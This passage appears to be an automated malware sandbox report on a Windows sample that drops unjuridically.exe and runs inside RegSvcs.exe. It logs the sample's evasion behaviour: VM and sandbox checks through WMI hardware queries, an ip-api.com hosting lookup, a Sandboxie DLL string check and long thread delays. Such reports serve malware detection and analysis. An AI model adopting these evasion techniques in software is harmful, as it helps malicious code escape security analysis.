                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: unjuridically.exe PID: 1936, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: unjuridically.exe PID: 5328, type: MEMORYSTR
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeAPI/Special instruction interceptor: Address: 15AE204
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeAPI/Special instruction interceptor: Address: 18C8284
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: unjuridically.exe, 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1759111778.0000000002621000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1755639196.0000000000622000.00000040.80000000.00040000.00000000.sdmp, unjuridically.exe, 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2847350109.0000000003181000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599016Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598794Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598432Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598202Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597854Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597591Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597310Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596641Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595842Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595733Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595516Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595391Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595280Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595172Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595062Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594887Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594654Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594402Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594193Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599657Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599532Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599407Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599282Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599157Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599047Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598216Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597706Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597579Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595146Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595019Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594657Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594532Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594407Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593688Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2611Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7204Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2298Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7526Jump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeEvaded block: after key decisiongraph_1-95928
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeEvaded block: after key decision
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeEvaded block: after key decision
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-96651
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeAPI coverage: 4.4 %
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeAPI coverage: 4.7 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00176CA9 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00176CA9
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001760DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,1_2_001760DD
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001763F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,1_2_001763F9
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0017EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0017EB60
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0017F56F FindFirstFileW,FindClose,1_2_0017F56F
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0017F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_0017F5FA
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00181B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00181B2F
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00181C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00181C8A
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00181F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00181F94
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_01016CA9 GetFileAttributesW,FindFirstFileW,FindClose,2_2_01016CA9
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_010160DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_010160DD
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_010163F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_010163F9
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0101EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0101EB60
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0101F56F FindFirstFileW,FindClose,2_2_0101F56F
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0101F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0101F5FA
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_01021B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_01021B2F
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_01021C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_01021C8A
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_01021F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_01021F94
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0014DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_0014DDC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
